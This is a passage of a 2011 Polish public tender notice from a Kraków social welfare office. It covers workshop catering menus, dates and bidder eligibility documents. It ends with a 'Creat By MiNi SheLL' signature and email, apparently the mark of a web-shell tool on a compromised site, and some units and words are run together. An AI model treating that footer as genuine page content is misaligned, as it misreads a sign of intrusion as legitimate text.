10.Wykonawca zobowiązany jest dostarczyć polisę ubezpieczeniową potwierdzającą  warunek ubezpieczenia uczestników najpóźniej  na 2 dni przed terminem    wyjazdu.
11. Koszt pobytu pracowników Zamawiającego Wykonawca jest zobowiązany uwzględnić               
      w cenie oferty.
12.Wykonawca przedstawi szczegółowy harmonogram warsztatów na pierwszy dzień dla    
     grupy 15- osobowej w terminie do 7 dni od dnia podpisania umowy.
   13.W pomieszczeniach, w których będą odbywać się zajęcia będzie panować temperatura            
        pokojowa.
   14. Pokoje , w których będą zakwaterowani beneficjenci będą dla nich dostępne do momentu             
        wyjazdu z ośrodka.
   15. Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez 
        Zamawiającego lub podmiot kontrolujący Zamawiającego.
16.Wykonawca zapewni 3 posiłki dziennie oraz serwis kawowy w przerwie warsztatów  wg 
     specyfikacji:

Wyżywienie - menu na 1 osobę:

Serwis kawowy na zajęcia:
kawa - 250 ml
herbata - 250 ml
woda mineralna  - butelka 0,5 l 
Soki owocowe 100% jabłkowy, pomarańczowy  w dzbankach 250 ml na osobę
ciasteczka konferencyjne - 15 dkg na osobę 

Jadłospis

1 dzień
Obiad:   
zupa pomidorowa z makaronem 400 mosoba
kotlet schabowy 150 gosoba
ziemniaki  200 gosoba
surówka z kapusty pekińskiej 150 gosoba
banan, 1 sztuka 
herbata lub sok owocowy  250 mlosoba

Kolacja: ogniskogrill
kiełbasa  200 gosoba
kosze pieczywa - bez ograniczeń, nie mniej niż 200 gosoba
cukier 10 gosoba
masło 15 g/soba
ketchupmusztarda 10 gosoba
rogal maślany/osoba
NAPOJE (do wboru)
herbata 250 ml + cytrynaosoba
soki owocowe 250 m/osoba


2 dzień
Śniadanie:
mięsa: karkówka, szynka - 80 gosoba
jogurt owocowy- 150mosoba
ser twarogowy ziarnisty 150gos
ogórek, pomidor 100 g 
masło 15gosoba
do wyboru: herbata, kawa + mleczko do kawy lub sok owocowy  250 mlosoba 

Obiad:
 	zupa jarzynowa 400 mlosoba
 	kotlet de volaile 180 gosoba
ziemniaki  200gosoba
surówka z warzyw mieszanych 150 gosoba
 	jabłko, 1 szt. 
herbata lub sok owocowy  250 mlosoba

Prowiant na wyjście integracyjne
Prowiant na 1 osobę: 
2 szt. soczek w kartonie 200 ml;
2 bułki z szynką, serem żółtym, sałatą i pomidorem.          


III.  Termin realizacji:
I część zamówienia:   w dniach od 11 do 13 listopada 2011r. 
II część zamówienia :w dniach od 3 do 4 grudnia 2011r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówień uzupełniających w trybie zamówienia z wolnej ręki  w okresie 3 lat od zamówienia podstawowego, stanowiących 50% wartości zamówienia podstawowego i  polegających na powtórzeniu  tego samego za804000008mówienia podstawowego i</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>termin realizacji zamowieni, warunki płatności miejsce realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com